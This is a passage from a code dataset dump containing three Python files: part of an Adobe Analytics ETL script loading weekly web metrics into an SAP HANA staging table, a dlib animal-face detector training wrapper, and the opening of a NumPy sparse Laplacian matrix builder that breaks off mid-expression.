final_data[\"BOUNCES\"].append(pageurl[\"counts\"][3])\n final_data[\"TIME_SPENT_ON_PAGE_(MIN)\"].append(pageurl[\"counts\"][4])\n final_data[\"E89_VIDEO_VIEWS\"].append(pageurl[\"counts\"][5])\n final_data[\"E17_FORM_SUCCESS\"].append(pageurl[\"counts\"][6])\n final_data[\"FORM_SUBMISSIONS\"].append(pageurl[\"counts\"][7])\n final_data[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"].append(pageurl[\"counts\"][8])\n final_data[\"ENTRIES\"].append(pageurl[\"counts\"][9])\n final_data[\"TOTAL_TIME_SPENT\"].append(pageurl[\"counts\"][10])\n\n innerdf[\"ITEM\"] = final_data[\"ITEM\"]\n innerdf[\"UNIQUE_VISITORS\"] = final_data[\"UNIQUE_VISITORS\"]\n innerdf[\"VISITS\"] = final_data[\"VISITS\"]\n innerdf[\"PAGE_VIEWS\"] = final_data[\"PAGE_VIEWS\"]\n innerdf[\"BOUNCES\"] = final_data[\"BOUNCES\"]\n innerdf[\"TIME_SPENT_ON_PAGE_(MIN)\"] = final_data[\"TIME_SPENT_ON_PAGE_(MIN)\"]\n innerdf[\"E89_VIDEO_VIEWS\"] = final_data[\"E89_VIDEO_VIEWS\"]\n innerdf[\"E17_FORM_SUCCESS\"] = final_data[\"E17_FORM_SUCCESS\"]\n innerdf[\"FORM_SUBMISSIONS\"] = final_data[\"FORM_SUBMISSIONS\"]\n innerdf[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"] = final_data[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"]\n innerdf[\"ENTRIES\"] = final_data[\"ENTRIES\"]\n innerdf[\"TOTAL_TIME_SPENT\"] = final_data[\"TOTAL_TIME_SPENT\"]\n innerdf[\"ACCOUNT_NUMBER\"] = pd.Series(final_data[\"ACCOUNT_NUMBER\"])\n #innerdf.fillna(method='ffill', inplace=True)\n innerdf[\"ACCOUNT_NUMBER\"] = innerdf[\"ACCOUNT_NUMBER\"].fillna(method='ffill')\n innerdf[\"START_DATE_OF_WEEK\"] = pd.Series(final_data[\"START_DATE_OF_WEEK\"])\n innerdf[\"START_DATE_OF_WEEK\"] = innerdf[\"START_DATE_OF_WEEK\"].fillna(method='ffill')\n innerdf[\"GRANULARITY\"] = pd.Series(final_data[\"GRANULARITY\"])\n innerdf[\"GRANULARITY\"] = innerdf[\"GRANULARITY\"].fillna(method='ffill')\n # outerdf['ETL_EXTRACT_DATE'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n #print (outerdf)\n #outerdf = pd.concat([outerdf,innerdf], ignore_index=True)\n outerdf = pd.concat([outerdf, innerdf], axis=0, ignore_index=True)\n outerdf = outerdf.drop_duplicates()\n\n columns = [\"ITEM\", \"UNIQUE_VISITORS\", \"VISITS\", \"PAGE_VIEWS\", \"BOUNCES\", \"TIME_SPENT_ON_PAGE_(MIN)\",\n \"E89_VIDEO_VIEWS\", \"E17_FORM_SUCCESS\", \"FORM_SUBMISSIONS\", \"TOTAL_WEEKLY_UNIQUE_VISITORS\",\n \"ENTRIES\",\"TOTAL_TIME_SPENT\"\t, \"ACCOUNT_NUMBER\", \"START_DATE_OF_WEEK\", \"GRANULARITY\", \"SEGMENT_ID\",\n \"GROUP\", \"ETL_EXTRACT_DATE\"]\n\n # outerdf['SEGMENT_ID'] = \"SUCCESS_PAGE\"\n outerdf['SEGMENT_ID'] = \"VALUE_CALCULATOR\"\n outerdf['GROUP'] = \"CUSTOMER_SUCCESS\"\n outerdf['ETL_EXTRACT_DATE'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n outerdf[\"START_DATE_OF_WEEK\"] = outerdf[\"START_DATE_OF_WEEK\"].map(self.date_conversion)\n print (outerdf.columns)\n outerdf = outerdf[columns]\n outerdf = outerdf.replace([np.inf, -np.inf], np.nan)\n outerdf = outerdf.replace('', np.NaN)\n outerdf = outerdf.replace('None', np.NaN)\n outerdf = outerdf.replace('nan', np.NaN)\n outerdf = outerdf.where((pd.notnull(outerdf)), None)\n db_obj = PyHdbWrapper()\n cursor, connection = db_obj.connect_hana(\n Utils.get_file_path(self.da_path, [SCRIPT_FOLDER_NAME, HANA_CONFIG_FILE]), 'HANA_ENV')\n # delete_page_url = db_obj.get_delete_query(self.schema + '.STG_ADOBE_CSC_DAILY')\n # db_obj.execute_sql(cursor, connection, delete_page_url, '', 'DELETE')\n for record in outerdf.to_dict(\"records\"):\n insert_query = db_obj.get_insert_query(self.schema + \".STG_ADOBE_CSC_WEEKLY\",\n record)\n\n values = list(record.values())\n #print(values)\n print (\"Inserting into Staging table\")\n db_obj.execute_sql(cursor, connection, insert_query, tuple(values), 'INSERT')\n print (\"Completed inserting into Staging table\")\n\n print(\"All records are inserted into Staging table\")\n # print (\"Upserting into Target table\")\n #\n # upsert_statement = \"UPSERT \\\"\" + self.schema + \"\\\".\\\"ADOBE_CSC_DAILY\\\" \\\n # SELECT * FROM \\\"\" + self.schema + \"\\\".\\\"STG_ADOBE_CSC_DAILY\\\"\"\n # db_obj.execute_sql(cursor, connection, upsert_statement, '', 'UPSERT')\n #\n # print (\"Completed upserting to target table\")\n\n\n\n\n\n #print(outerdf)\n\n outerdf.to_csv(r'C:\\Users\\chanukya.konduru\\Documents\\testing.csv', index=False)\n\n # breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element[\"breakdown\"])], ignore_index=True)\n # # breakdowndf_2 = pd.concat([breakdowndf_2, pd.DataFrame(element[\"breakdown\"][0][\"breakdown\"])], ignore_index=True)\n #\n #\n # breakdowndf_2 = pd.DataFrame(element[\"breakdown\"][0][\"breakdown\"])\n #\n # #print (breakdowndf_2)\n # names = metricsdf['name'].tolist()\n # for i,name in enumerate(names):\n # breakdowndf[name] = [metricname[i] for metricname in list(breakdowndf['counts'].tolist())]\n #\n # #print (breakdowndf.head())\n # breakdowndf.drop(['counts', 'url'], axis=1, inplace=True)\n # #breakdowndf = breakdowndf[['name', 'e17 Form Success', 'e89 Video Views']]\n # breakdown_length = len(response_body[\"report\"][\"data\"][0][\"breakdown\"])\n # breakdowndf[\"Granularity\"] = self.date_granularity\n # #print (breakdowndf)\n # # breakdowndf.to_csv(r'C:\\Users\\rajkiran.reddy\\Desktop\\SNow-Projects\\Framework\\master_\\Git_Repositories\\adobe_analytics\\testing.csv')\n\n\n\n\n\n counter_error = counter_error + 1\n\n # # Using Pandas library to load json data and transpose it for easy manuplation\n # adobe_ana_pd = pd.DataFrame.from_dict(response_body)\n # adobe_ana_pd = adobe_ana_pd.T\n # # Removing unwanted index from the dataFrame\n # adobe_ana_pd = adobe_ana_pd.drop(adobe_ana_pd.index[1:])\n #\n # # The metrics for Adobe Analytics is in 'data' column, so parsing it\n # final_data_df = pd.DataFrame(adobe_ana_pd['data'][0][0]['breakdown'])\n # #print (final_data_df.columns)\n # final_data_df = final_data_df.rename(columns={\"counts\": \"Counts\",\n # \"name\": \"Surf ID\",\n # \"url\": \"URL\"})\n #\n # final_data_df = final_data_df[[\"Counts\", \"Surf ID\"]]\n # final_data_df['Granularity'] = adobe_ana_pd['data'][0][0]['name']\n #\n # if len(adobe_ana_pd['data'][0][0]['breakdown'][0]['counts']) > 1:\n # final_data_df['Visits'] = final_data_df['Counts'].map(get_visits)\n # final_data_df['e17 Form Success'] = final_data_df['Counts'].map(get_form_success)\n # final_data_df['e89 Video Views'] = final_data_df['Counts'].map(get_video_views)\n # else:\n # final_data_df['Return Visits + Visits'] = final_data_df['Counts'].map(get_return_visits)\n #\n # final_data_df_columns = list(final_data_df.columns)\n # final_data_df_columns.remove('Counts')\n # final_data_df = final_data_df[final_data_df_columns]\n # print (final_data_df)\n #\n # if 'error' in response_body.keys():\n # if 'report_not_ready' in response_body['error']:\n # pass\n # else:\n # logger.error(api_response.text)\n # raise Exception(api_response.reason)\n # elif 'report' in response_body.keys():\n # counter_error = 1\n except Exception as e:\n logger.error(e)\n raise\n #\n #\n # # # Using Pandas library to load json data and transpose it for easy manuplation\n # # adobe_ana_pd = pd.DataFrame.from_dict(response_body)\n # # adobe_ana_pd = adobe_ana_pd.T\n # #\n # # # Removing unwanted index from the dataFrame\n # # adobe_ana_pd = adobe_ana_pd.drop(adobe_ana_pd.index[1:])\n # #\n # # # The metrics for Adobe Analytics is in 'data' column, so parsing it\n # # data_df = pd.read_json((adobe_ana_pd['data']).to_json())\n # # #print (data_df.head())\n # #\n # # # datetime.datetime.strptime(str(datetime.date.today()),\"%Y-%m-%d\")\n # #\n # #\n # # # call delete from table bane before processing response\n # # # also add the migration from staging to main table\n # #\n # # # Iterating over the JSON file to extract metrics\n # # self.response_handler(data_df)\n","sub_path":"adobe/adobe_base_file1.py","file_name":"adobe_base_file1.py","file_ext":"py","file_size_in_byte":27639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"169324045","text":"from image_detectoin.animal_face.dlib_face_detection.data_helper import DlibDataHelper\nfrom image_detectoin.animal_face.dlib_face_detection.detector import Detector\nfrom image_detectoin.animal_face.dlib_face_detection.model import DlibModel\n\n\ndef dlib_train(model_type):\n data_url = \"https://raw.githubusercontent.com/wangshengguang/image-detection/master/training_data.tar.gz\"\n DlibDataHelper(model_type).maybe_download_extract(data_url)\n model = DlibModel(model_type)\n model.train_shape_predictor()\n model.train_object_detector()\n model.view_object_detector()\n\n\nclass DlibPrediction(object):\n def __init__(self, model_type):\n self.detector = Detector(model_type)\n\n def predict(self, image_path):\n faces = self.detector.detect(image_path=image_path)\n return faces\n","sub_path":"image_detectoin/animal_face/animal_face.py","file_name":"animal_face.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"44268430","text":"import numpy as np\n#pythran export build2(int)\ndef build2(size):\n #how many coefficients ?\n nc= 5*(size-2)**2+ 16*(size-2)+ 12\n row= np.empty((nc),dtype=int)\n col=np.empty((nc),dtype=int)\n v=np.empty((nc),dtype=float)\n h=1./(size-1)\n h2=h*h\n cd=-4/h2\n hd=1./h2;\n I=lambda i,j: i*size+j\n count=0\n\n for i in range(0,size):\n for j in range(0,size):\n l=I(i,j)\n row[count]=l\n col[count]=l\n v[count]=cd\n count+=1\n for i1 in [-1,1]:\n if i+i1>=0 and i+i1=0 and j+i1